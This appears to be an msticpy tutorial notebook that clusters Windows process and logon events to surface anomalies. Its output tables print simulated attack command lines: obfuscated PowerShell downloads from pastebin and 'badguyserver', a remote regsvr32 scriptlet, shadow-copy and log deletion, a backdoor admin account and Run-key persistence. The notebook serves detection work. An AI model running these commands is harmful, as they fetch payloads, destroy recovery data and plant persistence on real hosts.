Often, large sets of events contain a lot of very repetitive and unintersting system processes. However, these frequently have values (e.g. commandline or path content) that varies on each execution. This makes it difficult to find outlying events using standard sorting and grouping techniques. We process the data to extract patterns and use clustering to group these repetitive events into a single row (with an execution count). This makes it easier to find unusual events.
You must have msticpy installed with the "ml" components to run this notebook:
%pip install --upgrade msticpy[ml]
%pip install seaborn
Requirement already satisfied: seaborn in f:\anaconda\envs\msticpy\lib\site-packages (0.11.2) Requirement already satisfied: numpy>=1.15 in f:\anaconda\envs\msticpy\lib\site-packages (from seaborn) (1.22.0) Requirement already satisfied: scipy>=1.0 in f:\anaconda\envs\msticpy\lib\site-packages (from seaborn) (1.7.3) Requirement already satisfied: matplotlib>=2.2 in f:\anaconda\envs\msticpy\lib\site-packages (from seaborn) (3.5.1) Requirement already satisfied: pandas>=0.23 in f:\anaconda\envs\msticpy\lib\site-packages (from seaborn) (1.3.5) Requirement already satisfied: pyparsing>=2.2.1 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (3.0.4) Requirement already satisfied: fonttools>=4.22.0 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (4.25.0) Requirement already satisfied: pillow>=6.2.0 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (8.4.0) Requirement already satisfied: cycler>=0.10 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (0.11.0) Requirement already satisfied: kiwisolver>=1.0.1 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (1.3.1) Requirement already satisfied: python-dateutil>=2.7 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (2.8.2) Requirement already satisfied: packaging>=20.0 in f:\anaconda\envs\msticpy\lib\site-packages (from matplotlib>=2.2->seaborn) (21.3) Requirement already satisfied: pytz>=2017.3 in f:\anaconda\envs\msticpy\lib\site-packages (from pandas>=0.23->seaborn) (2021.3) Requirement already satisfied: six>=1.5 in f:\anaconda\envs\msticpy\lib\site-packages (from python-dateutil>=2.7->matplotlib>=2.2->seaborn) (1.16.0) Note: you may need to restart the kernel to use updated packages.
# Imports
import sys
import warnings
from msticpy.common.utility import check_py_version
MIN_REQ_PYTHON = (3,6)
check_py_version(MIN_REQ_PYTHON)
from IPython import get_ipython
from IPython.display import display
import ipywidgets as widgets
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import networkx as nx
import pandas as pd
pd.set_option('display.max_rows', 100)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 100)
import msticpy
msticpy.init_notebook(globals())
from msticpy.vis.timeline import display_timeline
from msticpy.vis import nbdisplay
# Some of our dependencies (networkx) still use deprecated Matplotlib
# APIs - we can't do anything about it so suppress them from view
from matplotlib import MatplotlibDeprecationWarning
warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)
Sometimes you don't have a source process to work with. Other times it's just useful to see what else is going on on the host. This section retrieves all processes on the host within the time bounds set in the query times widget.
You can display the raw output of this by looking at the processes_on_host dataframe. Just copy this into a new cell and hit Ctrl-Enter.
Usually though, the results return a lot of very repetitive and unintersting system processes so we attempt to cluster these to make the view easier to negotiate. To do this we process the raw event list output to extract a few features that render strings (such as commandline)into numerical values. The default below uses the following features:
Then we run a clustering algorithm (DBScan in this case) on the process list. The result groups similar (noisy) processes together and leaves unique process patterns as single-member clusters.
from msticpy.analysis.eventcluster import dbcluster_events, add_process_features
processes_on_host = pd.read_csv(
"data/processes_on_host.csv",
parse_dates=["TimeGenerated"],
infer_datetime_format=True,
)
feature_procs = add_process_features(input_frame=processes_on_host)
# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_events, dbcluster, x_data) = dbcluster_events(
data=feature_procs,
cluster_columns=["commandlineTokensFull", "pathScore", "isSystemSession"],
time_column="TimeGenerated",
max_cluster_distance=0.0001,
)
print("Number of input events:", len(feature_procs))
print("Number of clustered events:", len(clus_events))
clus_events[["ClusterSize", "processName"]][clus_events["ClusterSize"] > 1].plot.bar(
x="processName", title="Process names with Cluster > 1", figsize=(12, 3)
)
Number of input events: 363 Number of clustered events: 62
<AxesSubplot:title={'center':'Process names with Cluster > 1'}, xlabel='processName'>
# Looking at the variability of commandlines and process image paths
import seaborn as sns
sns.set(style="darkgrid")
proc_plot = sns.catplot(
y="processName",
x="commandlineTokensFull",
data=feature_procs.sort_values("processName"),
kind="box",
height=10,
)
proc_plot.fig.suptitle("Variability of Commandline Tokens", x=1, y=1)
proc_plot = sns.catplot(
y="processName",
x="pathLogScore",
data=feature_procs.sort_values("processName"),
kind="box",
height=10,
hue="isSystemSession",
)
proc_plot.fig.suptitle("Variability of Path", x=1, y=1)
Text(1, 1, 'Variability of Path')
The top graph shows that, for a given process, some have a wide variability in their command line content while the majority have little or none. Looking at a couple of examples - like cmd.exe, powershell.exe, reg.exe, net.exe - we can recognize several common command line tools.
The second graph shows processes by full process path content. We wouldn't normally expect to see variation here - as is the cast with most. There is also quite a lot of variance in the score making it a useful proxy feature for unique path name (this means that proc1.exe and proc2.exe that have the same commandline score won't get collapsed into the same cluster).
Any process with a spread of values here means that we are seeing the same process name (but not necessarily the same file) is being run from different locations.
display(
clus_events.sort_values("ClusterSize")[
[
"TimeGenerated",
"LastEventTime",
"NewProcessName",
"CommandLine",
"ClusterSize",
"commandlineTokensFull",
"pathScore",
"isSystemSession",
]
]
)
TimeGenerated | LastEventTime | NewProcessName | CommandLine | ClusterSize | commandlineTokensFull | pathScore | isSystemSession | |
---|---|---|---|---|---|---|---|---|
46 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\reg.exe | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | 1 | 16 | 2951 | False |
356 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe... | 1 | 27 | 9108 | True |
301 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\cmd.exe | "cmd" | 1 | 2 | 2570 | True |
256 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe | "CollectGuestLogs.exe" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df... | 1 | 18 | 6421 | True |
219 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\wermgr.exe | C:\Windows\system32\wermgr.exe -upload | 1 | 7 | 2922 | True |
198 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c echo " SYSTEMINFO && SYSTEMINFO && DEL " | 1 | 17 | 2941 | False |
195 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web S... | 1 | 39 | 2941 | False |
176 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\wuauclt.exe | .\wuauclt.exe /C "c:\windows\softwaredistribution\cscript.exe" | 1 | 14 | 3406 | False |
171 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\svchost.exe | c:\Windows\System32\svchost.exe -k malicious | 1 | 9 | 3040 | False |
163 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\netsh.exe | .\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\users\Bob\appdata\Ro... | 1 | 18 | 3179 | False |
162 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... | 1 | 56 | 2941 | False |
139 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -command "(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'... | 1 | 36 | 3726 | False |
134 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\wbem\WmiPrvSE.exe | C:\Windows\system32\wbem\wmiprvse.exe -Embedding | 1 | 8 | 3546 | True |
133 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\sppsvc.exe | C:\Windows\system32\sppsvc.exe | 1 | 5 | 2933 | True |
130 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... | 1 | 25 | 3726 | False |
110 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | 1 | 46 | 2941 | False |
292 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\taskhostw.exe | taskhostw.exe SYSTEM | 1 | 2 | 3262 | True |
106 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... | 1 | 68 | 3726 | False |
57 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\tsetup.1.exe | c:\Diagnostics\UserTmp\tsetup.1.exe C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetu... | 1 | 40 | 3405 | False |
59 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\netsh.exe | .\netsh.exe "in (*.exe) do start # artificial commandline solely for purposes of triggering test" | 1 | 22 | 3179 | False |
61 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell Enable-WSManCredSSP =2013Role Server -force&ech... | 1 | 28 | 2941 | False |
64 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web... | 1 | 41 | 2941 | False |
65 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&del C:\inetpub\logs\logFiles\W3SVC1\*.log /q&echo [S]&cd&e... | 1 | 32 | 2941 | False |
74 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | 1 | 12 | 3024 | True |
62 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell winrm set winrm/config/service/Auth @{Kerberos=... | 1 | 31 | 2941 | False |
78 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\cmd.exe | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | 1 | 21 | 2570 | False |
82 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\net1.exe | C:\Windows\system32\net1 share TestShare=c:\testshare /Grant:Users,Read | 1 | 13 | 2638 | False |
83 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\Dism.exe | dism /online /enable-feature /featurename:File-Services /NoRestart | 1 | 11 | 2659 | True |
86 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\Temp\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\DismHost.exe | C:\Windows\TEMP\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\dismhost.exe {D57BA872-53C0-424D-80AE-E4911... | 1 | 15 | 4900 | True |
87 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\servicing\TrustedInstaller.exe | C:\Windows\servicing\TrustedInstaller.exe | 1 | 5 | 4175 | True |
94 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\regsvr32.exe | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | 1 | 20 | 3399 | False |
75 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\cmd.exe | cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp | 1 | 12 | 2570 | True |
108 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+("{2}{0}{1}"-f ':/','/past... | 1 | 53 | 3726 | False |
63 | 2019-01-15 05:15:16.850 | 2019-01-15 05:15:17.580 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\ProgramData"© \\[REDACTED]\c$\users\[REDACTED]\Documents\"Password Chan... | 2 | 29 | 2941 | False |
211 | 2019-01-15 05:15:19.223 | 2019-01-15 05:15:19.337 | C:\Diagnostics\UserTmp\hd.exe | hd.exe -pslist | 2 | 4 | 2837 | False |
190 | 2019-01-15 05:15:18.287 | 2019-01-15 05:15:18.967 | C:\Diagnostics\UserTmp\lsass.exe | .\lsass.exe /C "c:\windows\softwaredistribution\cscript.exe" | 2 | 14 | 3183 | False |
149 | 2019-01-15 05:15:15.520 | 2019-01-15 05:15:15.923 | C:\Windows\System32\net.exe | net group "Domain Admins" /domain | 2 | 8 | 2589 | False |
104 | 2019-01-15 05:15:12.977 | 2019-01-15 05:15:19.583 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | 2 | 24 | 3726 | False |
95 | 2019-01-15 05:15:10.817 | 2019-01-15 05:15:14.453 | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k wsappx | 2 | 8 | 3040 | True |
77 | 2019-01-15 05:15:03.247 | 2019-01-15 05:15:11.260 | C:\Windows\System32\cmd.exe | cmd /c echo Any questions about the commands executed here then please contact one of | 2 | 16 | 2570 | False |
270 | 2019-01-15 04:28:01.517 | 2019-01-15 04:28:33.090 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler | 2 | 17 | 4895 | True |
254 | 2019-01-15 04:42:25.437 | 2019-01-15 05:12:25.403 | C:\Windows\System32\MusNotification.exe | C:\Windows\system32\MusNotification.exe Display | 2 | 6 | 3826 | True |
60 | 2019-01-15 05:15:15.827 | 2019-01-15 05:15:16.720 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec... | 3 | 25 | 2941 | False |
142 | 2019-01-15 05:15:14.770 | 2019-01-15 05:15:15.283 | C:\Windows\System32\whoami.exe | whoami | 3 | 0 | 2907 | False |
125 | 2019-01-15 05:15:12.123 | 2019-01-15 05:15:17.650 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" | 3 | 21 | 2941 | False |
56 | 2019-01-15 05:15:16.117 | 2019-01-15 05:15:18.403 | C:\Diagnostics\UserTmp\reg.exe | .\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue | 3 | 15 | 2951 | False |
85 | 2019-01-15 05:15:03.830 | 2019-01-15 05:15:19.447 | C:\Windows\System32\net.exe | net use q: \\MSTICAlertsWin1\TestShare Bob_testing /User:adm1nistrator | 3 | 12 | 2589 | False |
49 | 2019-01-15 05:15:16.353 | 2019-01-15 05:15:16.520 | C:\Diagnostics\UserTmp\42424.exe | 42424.exe | 3 | 1 | 2889 | False |
69 | 2019-01-15 05:15:03.390 | 2019-01-15 05:15:17.137 | C:\Windows\System32\vssadmin.exe | vssadmin delete shadows /all /quiet | 4 | 7 | 3131 | False |
193 | 2019-01-15 05:02:28.260 | 2019-01-15 05:15:19.537 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "powershell wscript.shell used to download a .gif" | 5 | 14 | 2941 | False |
169 | 2019-01-15 05:15:14.493 | 2019-01-15 05:15:19.060 | C:\Diagnostics\UserTmp\svchost.exe | c:\Diagnostics\UserTmp\svchost.exe | 6 | 6 | 3411 | False |
122 | 2019-01-15 05:15:11.947 | 2019-01-15 05:15:19.403 | C:\Diagnostics\UserTmp\implant.exe | implant.exe k111 | 7 | 3 | 3390 | False |
68 | 2019-01-15 05:15:12.513 | 2019-01-15 05:15:18.630 | C:\Diagnostics\UserTmp\doubleextension.pdf.exe | c:\Diagnostics\UserTmp\doubleextension.pdf.exe | 7 | 7 | 4617 | False |
80 | 2019-01-15 05:15:03.410 | 2019-01-15 05:15:18.670 | C:\Windows\System32\net1.exe | C:\Windows\system32\net1 user adm1nistrator Bob_testing /add | 7 | 10 | 2638 | False |
67 | 2019-01-15 05:15:05.193 | 2019-01-15 05:15:19.617 | C:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | 9 | 6 | 5005 | False |
48 | 2019-01-15 05:15:10.667 | 2019-01-15 05:15:18.917 | C:\Diagnostics\UserTmp\rundll32.exe | .\rundll32 /C 42424.exe | 15 | 7 | 3391 | False |
47 | 2019-01-15 05:15:03.057 | 2019-01-15 05:15:18.820 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "systeminfo && systeminfo" | 23 | 10 | 2941 | False |
96 | 2019-01-15 05:15:11.190 | 2019-01-15 05:15:18.867 | C:\Windows\System32\win32calc.exe | "C:\Windows\System32\win32calc.exe" | 28 | 8 | 3100 | False |
0 | 2019-01-15 04:16:24.007 | 2019-01-15 05:24:24.010 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\D... | 35 | 52 | 12225 | True |
2 | 2019-01-15 04:16:25.550 | 2019-01-15 05:24:25.807 | C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding | 38 | 10 | 3478 | True |
1 | 2019-01-15 04:16:24.027 | 2019-01-15 05:24:24.023 | C:\Windows\System32\conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 39 | 10 | 3028 | True |
3 | 2019-01-15 04:15:26.000 | 2019-01-15 05:24:26.010 | C:\Windows\System32\cscript.exe | "C:\Windows\system32\cscript.exe" /nologo "MonitorKnowledgeDiscovery.vbs" | 71 | 13 | 3022 | True |
# Look at clusters for individual process names
def view_cluster(exe_name):
display(
clus_events[["ClusterSize", "processName", "CommandLine", "ClusterId"]][
clus_events["processName"] == exe_name
]
)
view_cluster("reg.exe")
ClusterSize | processName | CommandLine | ClusterId | |
---|---|---|---|---|
46 | 1 | reg.exe | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | -1 |
56 | 3 | reg.exe | .\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue | 7 |
# Show all clustered processes
from msticpy.analysis.eventcluster import plot_cluster
# Create label with unqualified path
labelled_df = processes_on_host.copy()
labelled_df["label"] = labelled_df.apply(
lambda x: x.NewProcessName.split("\\")[-1], axis=1
)
%matplotlib inline
#%matplotlib notebook
plt.rcParams["figure.figsize"] = (15, 10)
plot_cluster(
dbcluster,
labelled_df,
x_data,
plot_label="label",
plot_features=[0, 1],
verbose=False,
cut_off=3,
xlabel="CmdLine Tokens",
ylabel="Path Score",
)
<module 'matplotlib.pyplot' from 'F:\\anaconda\\envs\\msticpy\\lib\\site-packages\\matplotlib\\pyplot.py'>
# Show timeline of events - clustered events
clus_events.mp_plot.timeline(
# overlay_data=processes_on_host,
title="Distinct Host Processes (bottom) and All Proceses (top)"
)
Since the number of logon events may be large and, in the case of system logons, very repetitive, we use clustering to try to identity logons with unique characteristics.
In this case we use the numeric score of the account name and the logon type (i.e. interactive, service, etc.). The results of the clustered logons are shown below along with a more detailed, readable printout of the logon event information. The data here will vary depending on whether this is a Windows or Linux host.
from msticpy.analysis.eventcluster import (
dbcluster_events,
add_process_features,
char_ord_score,
)
host_logons = pd.read_csv(
"data/host_logons.csv", parse_dates=["TimeGenerated"], infer_datetime_format=True
)
logon_features = host_logons.copy()
logon_features["AccountNum"] = host_logons.apply(
lambda x: char_ord_score(x.Account), axis=1
)
logon_features["LogonHour"] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)
# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_logons, _, _) = dbcluster_events(
data=logon_features,
time_column="TimeGenerated",
cluster_columns=["AccountNum", "LogonType"],
max_cluster_distance=0.0001,
)
print("Number of input events:", len(host_logons))
print("Number of clustered events:", len(clus_logons))
print("\nDistinct host logon patterns:")
display(clus_logons.sort_values("TimeGenerated"))
Number of input events: 14 Number of clustered events: 3 Distinct host logon patterns:
Unnamed: 0 | TenantId | Account | EventID | TimeGenerated | SourceComputerId | Computer | SubjectUserName | SubjectDomainName | SubjectUserSid | TargetUserName | TargetDomainName | TargetUserSid | TargetLogonId | LogonProcessName | LogonType | AuthenticationPackageName | Status | IpAddress | WorkstationName | AccountNum | LogonHour | Clustered | ClusterId | ClusterSize | FirstEventTime | LastEventTime | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | 1 | 802d39e1-9d70-404d-832c-2de5e2478eda | NT AUTHORITY\SYSTEM | 4624 | 2019-01-15 01:42:28.340 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | SYSTEM | NT AUTHORITY | S-1-5-18 | 0x3e7 | Advapi | 5 | Negotiate | NaN | - | - | 1484 | 5 | True | 1 | 11 | 2019-01-15 01:42:28.340 | 2019-01-15 05:15:14.453 |
0 | 0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4624 | 2019-01-15 04:28:33.090 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | MSTICAdmin | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | 0xfaac27 | Advapi | 4 | Negotiate | NaN | - | MSTICAlertsWin1 | 2319 | 5 | True | 0 | 2 | 2019-01-15 04:28:33.090 | 2019-01-15 05:15:02.980 |
2 | 2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\adm1nistrator | 4624 | 2019-01-15 05:15:06.363 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | - | - | S-1-0-0 | adm1nistrator | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-1066 | 0xfb5ee6 | NtLmSsp | 3 | NTLM | NaN | fe80::38dc:e4a9:61bd:b458 | MSTICAlertsWin1 | 2799 | 5 | False | -1 | 1 | 2019-01-15 05:15:06.363 | 2019-01-15 05:15:06.363 |
# Display logon details
nbdisplay.display_logon_data(clus_logons)
Account: adm1nistrator Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 05:15:06.363000 Logon type: 3(Network) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-1066 SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account Subject (source) account: -/- Logon process: NtLmSsp Authentication: NTLM Source IpAddress: fe80::38dc:e4a9:61bd:b458 Source Host: MSTICAlertsWin1 Logon status: nan |
Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 04:28:33.090000 Logon type: 4(Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status: nan |
Account: SYSTEM Account Domain: NT AUTHORITY Logon Time: 2019-01-15 01:42:28.340000 Logon type: 5(Service) User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEM Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status: nan |
clus_logons
Unnamed: 0 | TenantId | Account | EventID | TimeGenerated | SourceComputerId | Computer | SubjectUserName | SubjectDomainName | SubjectUserSid | TargetUserName | TargetDomainName | TargetUserSid | TargetLogonId | LogonProcessName | LogonType | AuthenticationPackageName | Status | IpAddress | WorkstationName | AccountNum | LogonHour | Clustered | ClusterId | ClusterSize | FirstEventTime | LastEventTime | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | 2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\adm1nistrator | 4624 | 2019-01-15 05:15:06.363 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | - | - | S-1-0-0 | adm1nistrator | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-1066 | 0xfb5ee6 | NtLmSsp | 3 | NTLM | NaN | fe80::38dc:e4a9:61bd:b458 | MSTICAlertsWin1 | 2799 | 5 | False | -1 | 1 | 2019-01-15 05:15:06.363 | 2019-01-15 05:15:06.363 |
0 | 0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4624 | 2019-01-15 04:28:33.090 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | MSTICAdmin | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | 0xfaac27 | Advapi | 4 | Negotiate | NaN | - | MSTICAlertsWin1 | 2319 | 5 | True | 0 | 2 | 2019-01-15 04:28:33.090 | 2019-01-15 05:15:02.980 |
1 | 1 | 802d39e1-9d70-404d-832c-2de5e2478eda | NT AUTHORITY\SYSTEM | 4624 | 2019-01-15 01:42:28.340 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | SYSTEM | NT AUTHORITY | S-1-5-18 | 0x3e7 | Advapi | 5 | Negotiate | NaN | - | - | 1484 | 5 | True | 1 | 11 | 2019-01-15 01:42:28.340 | 2019-01-15 05:15:14.453 |
# Show timeline of events - all logons + clustered logons
# ref marker indicates
logon_data = {"Clustered": {"data": clus_logons}, "All Logons": {"data": host_logons}}
display_timeline(
data=logon_data,
source_columns=["Account", "LogonType"],
ref_event=clus_logons.iloc[0],
title="All Host Logons",
legend="inline",
)
This shows the timeline of the clustered logon events with the process tree obtained earlier. This allows you to get a sense of which logon was responsible for the process tree session whether any additional logons (e.g. creating a process as another user) might be associated with the alert timeline.
Note you should use the pan and zoom tools to align the timelines since the data may be over different time ranges.
# Show timeline of events - all events
display_timeline(data=clus_logons,
source_columns=['Account', 'LogonType'],
title='Clustered Host Logons', height=200)
process_tree = pd.read_csv('data/process_tree.csv',
parse_dates=["TimeGenerated"],
infer_datetime_format=True)
display_timeline(data=process_tree,
title='Alert Process Session', height=200)
display_timeline(data=clus_logons, group_by="Account",
source_columns=['Account', 'LogonType'],
title='Clustered Host Logons',
legend="right",
yaxis=True)
# Counts of Logon types by Account
host_logons[['Account', 'LogonType', 'TimeGenerated']].groupby(['Account','LogonType']).count()
TimeGenerated | ||
---|---|---|
Account | LogonType | |
MSTICAlertsWin1\MSTICAdmin | 4 | 2 |
MSTICAlertsWin1\adm1nistrator | 3 | 1 |
NT AUTHORITY\SYSTEM | 5 | 11 |